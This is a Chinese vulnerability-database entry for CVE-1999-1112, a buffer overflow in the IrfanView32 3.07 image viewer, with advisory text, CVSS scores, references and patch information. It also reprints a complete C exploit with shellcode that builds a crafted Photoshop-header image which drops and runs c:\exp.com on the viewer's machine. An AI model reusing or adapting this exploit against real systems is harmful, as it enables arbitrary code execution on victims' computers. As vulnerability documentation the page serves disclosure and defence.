CVE-1999-1112
CVSS7.5
发布时间 :1999-11-09 00:00:00
修订时间 :2008-09-05 16:18:44
NMCOES    

[原文]Buffer overflow in IrfanView32 3.07 and earlier allows attackers to execute arbitrary commands via a long string after the "8BPS" image type in a Photo Shop image header.


[CNNVD]IrfanView32图像文件缓冲区溢出漏洞(CNNVD-199911-032)

        IrfanView32 3.07及早期版本存在缓冲区溢出漏洞。攻击者可以用在Photo Shop图像头中"8BPS"图像类型后的一个长字符串执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1112
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1112
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-032
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/3549.php
(VENDOR_ADVISORY)  XF  irfan-view32-bo(3549)
http://www.securityfocus.com/bid/781
(VENDOR_ADVISORY)  BID  781
http://www.securityfocus.com/archive/1/34066
(VENDOR_ADVISORY)  BUGTRAQ  19991109 Irfan view 3.07 buffer overflow
http://stud4.tuwien.ac.at/~e9227474/main2.html
(VENDOR_ADVISORY)  MISC  http://stud4.tuwien.ac.at/~e9227474/main2.html

- 漏洞信息

IrfanView32图像文件缓冲区溢出漏洞
高危 缓冲区溢出
1999-11-09 00:00:00 2005-10-20 00:00:00
远程※本地  
        IrfanView32 3.07及早期版本存在缓冲区溢出漏洞。攻击者可以用在Photo Shop图像头中"8BPS"图像类型后的一个长字符串执行任意指令。

- 公告与补丁

        Irfan Skiljan has released version 3.10, available at:
        http://stud1.tuwien.ac.at/~e9227474/iview310.zip

- 漏洞信息 (19610)

Irfan Skiljan IrfanView32 3.0.7 Image File Buffer Overflow Vulnerability (EDBID:19610)
windows local
1999-11-09 Verified
0 UNYUN
N/A [点击下载]
source: http://www.securityfocus.com/bid/781/info

IrfanView32, a freeware image viewer, has a problem in the handling of Adobe Photoshop generated jpegs. If a .jpg file is opened for viewing that contains the Adobe Photoshop marker in the header (8BPS) followed by a long string, the program will crash. It is possible to insert code in the string for execution. 

/*=============================================================================
   Irfan View 3.07 Exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/

#include    <stdio.h>
#include    <string.h>
#include    <windows.h> 

#define     MAXBUF          0x22e0
#define     RETADR          0x31E
#define     FAKE_ADR        0x80101010  // Writable buffer pointer

#define     JMPESP_ADR      0xbffca4f7  // You have to change this value
                                        // for non-Japanese Windows98.
#define     HEAD            "8BPS\0"

unsigned char   exploit_code[300]={
 0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
 0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
 0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
 0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
 0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
 0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
 0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
 0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
 0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
 0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
 0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
 0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
 0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
};

// "exp.com"
unsigned char   exploit_data[1000]={
0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
0x20,0x77,0xf1,0xeb,0xf1,0x00
};

int  GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};

char string_buffer[1000]  ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
char filename[100]        = "c:\\exp.com";

main(int argc,char *argv[])
{
    unsigned char   buf[MAXBUF],l1,l2;
    unsigned int    ip,p1,p2,i;
    FILE            *fp;
    
    if (argc<2){
        printf("usage : %s outputfile\n",argv[0]);
        exit(1);
    }
    memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
    memcpy(buf,HEAD,4);
    
    ip=JMPESP_ADR;
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    buf[RETADR+6]=0xeb;
    buf[RETADR+7]=0x04;

    ip=FAKE_ADR;
    buf[RETADR+8]=ip&0xff;
    buf[RETADR+9]=(ip>>8)&0xff;
    buf[RETADR+10]=(ip>>16)&0xff;
    buf[RETADR+11]=(ip>>24)&0xff;
    
    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x1f]=p1&0xff;
    exploit_code[0x20]=(p1>>8)&0xff;
    exploit_code[0x21]=(p1>>16)&0xff;
    exploit_code[0x22]=(p1>>24)&0xff;

    for (i=0;i<4;i++){
        exploit_code[GetProcAddress_fcp[i]  ]=p2&0xff;
        exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff;
        exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff;
        exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff;
    }

    l1=strlen(filename)+strlen(string_buffer);
    l2=strlen(exploit_data);
    strcat(string_buffer,filename );
    strcat(string_buffer,"_" );
    strcat(string_buffer,exploit_data );
    strcat(exploit_code, string_buffer );
    exploit_code[0x1c]  = l1;
    exploit_code[0x6d]  = l2;
    exploit_code[0x77]  = l1+1;

    memcpy(buf+RETADR+12,exploit_code,strlen(exploit_code));

    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("Can not write file '%s'\n",argv[1]);
        exit(1);
    }
    
    fwrite(buf,1,MAXBUF,fp);
    fclose(fp);
    printf("Done.\n");
    return FALSE;
}




		

- 漏洞信息

10237
IrfanView32 8BPS PhotoShop Image Header Arbitrary Command Execution
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public

- 漏洞描述

A local overflow exists in IrfanView32. The viewer fails to check the bounds of header information resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

1999-11-09 Unknow
1999-11-09 Unknow

- 解决方案

Upgrade to version 3.36 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

IrfanView32 Image File Buffer Overflow Vulnerability
Boundary Condition Error 781
Yes Yes
1999-11-09 12:00:00 2009-07-11 12:56:00
Posted to Bugtraq on November 9, 1999 by UNYUN <shadowpenguin@backsection.net>.

- 受影响的程序版本

Irfan Skiljan IrfanView32 3.0.7
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- 漏洞讨论

IrfanView32, a freeware image viewer, has a problem in the handling of Adobe Photoshop generated jpegs. If a .jpg file is opened for viewing that contains the Adobe Photoshop marker in the header (8BPS) followed by a long string, the program will crash. It is possible to insert code in the string for execution.

- 漏洞利用

This exploit will generate a jpg image that when viewed by IrfanView will create a file, exp.com, in the root of C:. This file will then be executed.

- 解决方案

Irfan Skiljan has released version 3.10, available at:
http://stud1.tuwien.ac.at/~e9227474/iview310.zip

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站